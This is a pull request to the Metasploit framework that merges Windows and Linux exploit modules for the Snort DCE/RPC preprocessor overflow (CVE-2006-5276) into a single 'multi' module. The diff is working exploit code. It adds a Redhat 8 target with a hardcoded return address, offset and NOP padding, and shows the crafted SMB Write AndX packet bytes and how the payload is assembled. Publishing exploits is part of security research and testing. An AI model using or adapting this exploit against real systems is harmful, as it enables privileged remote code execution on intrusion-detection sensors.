### PR TITLE
combining linux and windows exploits for Snort DCE/RPC bug into one 'multi' module

### DIFF
--- a/modules/exploits/multi/ids/snort_dce_rpc.rb
+++ b/modules/exploits/multi/ids/snort_dce_rpc.rb
@@ -31,14 +31,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Author'          =>
 				[
 					'Neel Mehta', #Original discovery (IBM X-Force)
-					'Carsten Maartmann-Moe <carsten[at]carmaa.com>'  #Metasploit
+					'Trirat Puttaraksa', #POC
+					'Carsten Maartmann-Moe <carsten[at]carmaa.com>',  #Metasploit win
+					'0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux
+					
 				],
 			'License'         => MSF_LICENSE,
-			'Platform'        => 'win',
 			'References'      =>
 				[
 					[ 'OSVDB', '32094' ],
 					[ 'CVE', '2006-5276' ],
+					[ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],
+					[ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],
 					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
 				],
 			'DefaultOptions'  =>
@@ -56,10 +60,21 @@ class Metasploit3 < Msf::Exploit::Remote
 					[
 						'Windows Universal',
 						{
+							'Platform' => 'win',
 							'Ret'    => 0x00407c01,  # JMP ESP snort.exe
-							'Offset' => 289          # The number of bytes before overwrite
+							'Offset' => 289,         # The number of bytes before overwrite
+							'Padding' => 0
 						}
 					],
+					[
+						'Redhat 8',
+						{	
+							'Platform' => 'linux',
+							'Ret' => 0xbffff110,
+							'Offset' => 317,
+							'Padding' => 28	
+						}
+					]
 				],
 			'Privileged'      => true,
 			'DisclosureDate'  => 'Feb 19 2007',
@@ -133,7 +148,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Write AndX Request #2
 		header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
 		header << "\x00\x48\x00\x00\x00\xff\x01"
-
 		tail = "\x00\x00\x00\x00\x49\x00\xee"
 
 		# Return address
@@ -150,7 +164,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		requestsize = [(sploit.size() + target['Offset'])].pack('v')
 
 		# Assemble the parts into one package
-		p.payload = header << requestsize << tail << eip << sploit
+		p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit	
+		
 		p.recalc
 
 		p


### PR DESCRIPTION
unstable-modules/exploits/incomplete/linux/ids/snortdcerpc.rb
added to
exploits/windows/ids/snort_dce_rpc.rb
equals
exploits/multi/ids/snort_dce_rpc.rb
